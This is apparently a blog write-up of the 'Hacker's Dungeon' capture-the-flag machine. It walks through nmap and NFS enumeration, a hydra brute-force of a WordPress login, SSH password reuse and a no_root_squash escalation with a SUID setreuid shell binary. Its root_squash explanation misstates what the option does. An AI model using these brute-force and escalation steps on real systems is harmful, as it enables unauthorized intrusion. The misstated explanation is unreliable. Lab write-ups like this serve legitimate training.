Post

Hacker's Dungeon Machine Write up

Posted
By Ahmad Alawneh 2 min read

Hacker’s Dungeon

IP: 10.0.0.133

Enumeration

We start by scanning the machine with nmap.

Discover all open ports:

Alt text

Check what is exactly running on these ports:

Alt text

Foothold

Port 111 and 2049

Check HackTricks for pentesting rpcbin and nfs.

https://book.hacktricks.xyz/network-services-pentesting/pentesting-rpcbind#rpcbind-+-nfs

https://book.hacktricks.xyz/network-services-pentesting/nfs-service-pentesting#enumeration

List NFS mounts:

1

nmap --script="nfs-showmount" 10.0.0.133

Alt text

There is one folder /dungeon.

Mount this folder.

1

mkdir /tmp/mount

1

sudo mount -t nfs 10.0.0.133:dungeon /tmp/mount -o nolock

Alt text

Nothing interesting.

Port 80

As we saw in our nmap scan that the robots.txt file has one disallowed directory which is wp-admin which indecates that there is a wordpress running on port 80.

Visiting the site.

We know the version of wordpress and apache this might be helpfull, but let us look around more. Alt text

Alt text Nothing seems interesting.

Checking the post by cliking on the date.

Alt text We notice that the post was written by user kasi.

We can confirm that the user kasi exists by trying to login with any random password on wp-login.php adn reading the error message.

The different weeor message will be displayed if we try random username and password test:test.

Alt text

We try to brute force kasi’s password using hydra.

1

hydra -l kasi -P /usr/share/wordlists/rockyou.txt 10.0.0.133 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^:F=incorrect"

Alt text

We got the user’s password dogcat.

After logging in we land on the profile page of the user, there is nothing interesting there.

Alt text

Going around the dashboard we find out that we are normal user, so we cant do much.

Let us try and login with the same credentials thru ssh, there is a great chance the password is reused.

Alt text

And we are in!!

We can find the user.txt flag in the user’s home directory.

Alt text

Privilege Escalation

Running sudo -l to check what the user kasi can run using sudo.

Alt text

Run python simple web server on our attacking machine to host linpeas.sh, to transfer it to the machine.

1

python3 -m http.server 80

Alt text Alt text

What is root_squash?

root_squash will allow the root user on the client to both access and create files on the NFS server as root. Technically speaking, this option will force NFS to change the client’s root to an anonymous ID and, in effect, this will increase security by preventing ownership of the root account on one system migrating to the other system. This is needed if you are hosting root filesystems on the NFS server (especially for diskless clients); with this in mind, it can be used (sparingly) for selected hosts, but you should not use no_root_squash unless you are aware of the consequences.

Read about the vulnerability.

We need to make a binary that will set our user id to 0 and givves us a shell as root.

#include <stdio.h>
int main(void){
    setreuid(0,0);
    system("/bin/bash");
    return 0;
      }

Compile it using gcc.

1

gcc test.c -o test

As the root user on the attacking machine copy the binray test to the mounted directory, and set the SUID bit for it.

Alt text Alt text

Back to the target machine on /dungeon we can find the binary and run it.

Alt text

We can find the root.txt flag in the root user’s home directory.

Alt text

Write-ups, MachinesCTF
CTF Pentesting
This post is licensed under CC BY 4.0 by the author.